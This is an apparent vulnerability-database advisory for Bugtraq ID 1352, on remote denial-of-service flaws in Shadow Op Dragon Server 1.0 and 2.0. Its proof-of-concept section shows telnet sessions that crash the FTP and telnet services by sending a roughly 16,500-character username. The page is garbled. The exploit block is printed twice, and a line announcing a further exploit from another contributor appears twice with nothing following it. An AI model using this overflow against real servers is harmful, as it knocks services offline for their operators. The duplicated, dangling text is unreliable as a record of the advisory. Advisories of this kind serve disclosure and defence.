Shadow Op Dragon Server Multiple DoS Vulnerabilities
BID:1352
Info
Shadow Op Dragon Server Multiple DoS Vulnerabilities
| Bugtraq ID: | 1352 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2000-0479 CVE-2000-0480 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 16 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | This vulnerability was posted to the Bugtraq mailing list on June 16, 2000 by Ussr Labs <[email protected]> |
| Vulnerable: |
Shadow Op Software Dragon Server 2.0 Shadow Op Software Dragon Server 1.0 |
| Not Vulnerable: | |
Exploit / POC
Shadow Op Dragon Server Multiple DoS Vulnerabilities
Ftp:
$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 Dragon Server v2.0, ready.
USER [buffer]
Where [buffer] is aprox. 16500 characters.
Telnet
$ telnet example.com
Trying example.com...
Connected to example.com.
Escape character is '^]'.
Dragon Server v2.0, ready.
Login: [buffer]
Where [buffer] is aprox. 16500 characters.
Prizm <[email protected]> has also provided the following exploit:
Ftp:
$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 Dragon Server v2.0, ready.
USER [buffer]
Where [buffer] is aprox. 16500 characters.
Telnet
$ telnet example.com
Trying example.com...
Connected to example.com.
Escape character is '^]'.
Dragon Server v2.0, ready.
Login: [buffer]
Where [buffer] is aprox. 16500 characters.
Prizm <[email protected]> has also provided the following exploit: